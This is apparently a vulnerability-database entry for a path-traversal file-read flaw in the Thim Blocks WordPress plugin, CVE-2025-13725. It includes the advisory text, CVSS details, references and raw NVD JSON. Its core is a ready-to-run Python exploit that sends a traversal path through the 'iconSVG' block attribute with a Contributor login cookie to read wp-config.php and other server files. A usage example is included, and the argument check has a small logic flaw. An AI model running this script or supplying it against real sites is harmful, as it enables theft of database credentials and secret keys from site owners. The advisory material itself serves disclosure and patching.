CVE-2025-13725

Description

The Gutenberg Thim Blocks – Page Builder, Gutenberg Blocks for the Block Editor plugin for WordPress is vulnerable to arbitrary file reads in all versions up to, and including, 1.0.1. This is due to insufficient path validation in the server-side rendering of the thim-blocks/icon block. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server via the 'iconSVG' parameter, which can contain sensitive information such as wp-config.php.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Gutenberg Thim Blocks插件 <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13725 PoC - Arbitrary File Read in Thim Blocks WordPress Plugin
# Target: WordPress site with Thim Blocks plugin <= 1.0.1

def exploit_file_read(target_url, file_path, auth_cookie):
    """
    Exploit arbitrary file read vulnerability via iconSVG parameter
    
    Args:
        target_url: Base URL of the WordPress site
        file_path: Path to the file to read (e.g., ../../wp-config.php)
        auth_cookie: Authentication cookie for Contributor+ user
    """
    
    # Construct the REST API endpoint for the icon block
    endpoint = f"{target_url}/wp-json/wp/v2/block-renderer/thim-blocks/icon"
    
    # Prepare the payload with malicious iconSVG parameter
    params = {
        "context": "edit",
        "attributes[iconSVG]": file_path
    }
    
    headers = {
        "Cookie": auth_cookie,
        "Content-Type": "application/json"
    }
    
    try:
        response = requests.get(endpoint, params=params, headers=headers, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Successfully read file: {file_path}")
            print(f"[+] Response length: {len(response.text)} bytes")
            return response.text
        else:
            print(f"[-] Failed to read file. Status code: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {str(e)}")
        return None

def main():
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-13725.py <target_url> <file_path> <cookie> [output_file]")
        print("Example: python cve-2025-13725.py http://target.com ../../wp-config.php 'wordpress_logged_in_xxx=xxx'")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    file_path = sys.argv[2]
    auth_cookie = sys.argv[3]
    output_file = sys.argv[4] if len(sys.argv) > 4 else None
    
    print(f"[*] Target: {target_url}")
    print(f"[*] File to read: {file_path}")
    
    content = exploit_file_read(target_url, file_path, auth_cookie)
    
    if content:
        if output_file:
            with open(output_file, 'w', encoding='utf-8') as f:
                f.write(content)
            print(f"[+] Content saved to: {output_file}")
        else:
            print("[*] File content:")
            print(content)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13725
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13725
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13725/
[4] VulDB https://vuldb.com/cve/CVE-2025-13725
[5] https://plugins.trac.wordpress.org/browser/thim-blocks/tags/1.0.1/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L92
[6] https://plugins.trac.wordpress.org/browser/thim-blocks/tags/1.0.1/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L97
[7] https://plugins.trac.wordpress.org/browser/thim-blocks/trunk/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L92
[8] https://plugins.trac.wordpress.org/browser/thim-blocks/trunk/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L97
[9] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3419638%40thim-blocks&new=3419638%40thim-blocks&sfp_email=&sfph_mail=
[10] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3424998%40thim-blocks&new=3424998%40thim-blocks&sfp_email=&sfph_mail=
[11] https://www.wordfence.com/threat-intel/vulnerabilities/id/80de464f-a4b0-4aaf-8869-f8d29a422bdb?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13725", "sourceIdentifier": "[email protected]", "published": "2026-01-17T04:16:06.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gutenberg Thim Blocks – Page Builder, Gutenberg Blocks for the Block Editor plugin for WordPress is vulnerable to arbitrary file reads in all versions up to, and including, 1.0.1. This is due to insufficient path validation in the server-side rendering of the thim-blocks/icon block. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server via the 'iconSVG' parameter, which can contain sensitive information such as wp-config.php."}, {"lang": "es", "value": "El plugin Gutenberg Thim Blocks – Page Builder, Gutenberg Blocks para the Block Editor para WordPress es vulnerable a lecturas arbitrarias de archivos en todas las versiones hasta la 1.0.1, inclusive. Esto se debe a una validación de ruta insuficiente en la renderización del lado del servidor del bloque thim-blocks/icon. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, lean el contenido de archivos arbitrarios en el servidor a través del parámetro 'iconSVG', que puede contener información sensible como wp-config.php."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/thim-blocks/tags/1.0.1/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/thim-blocks/tags/1.0.1/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L97", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/thim-blocks/trunk/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/thim-blocks/trunk/inc/Gutenberg/Blocks/Icon/IconBlockType.php#L97", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3419638%40thim-blocks&new=3419638%40thim-blocks&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3424998%40thim-blocks&new=3424998%40thim-blocks&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/80de464f-a4b0-4aaf-8869-f8d29a422bdb?source=cve", "source": "[email protected]"}]}}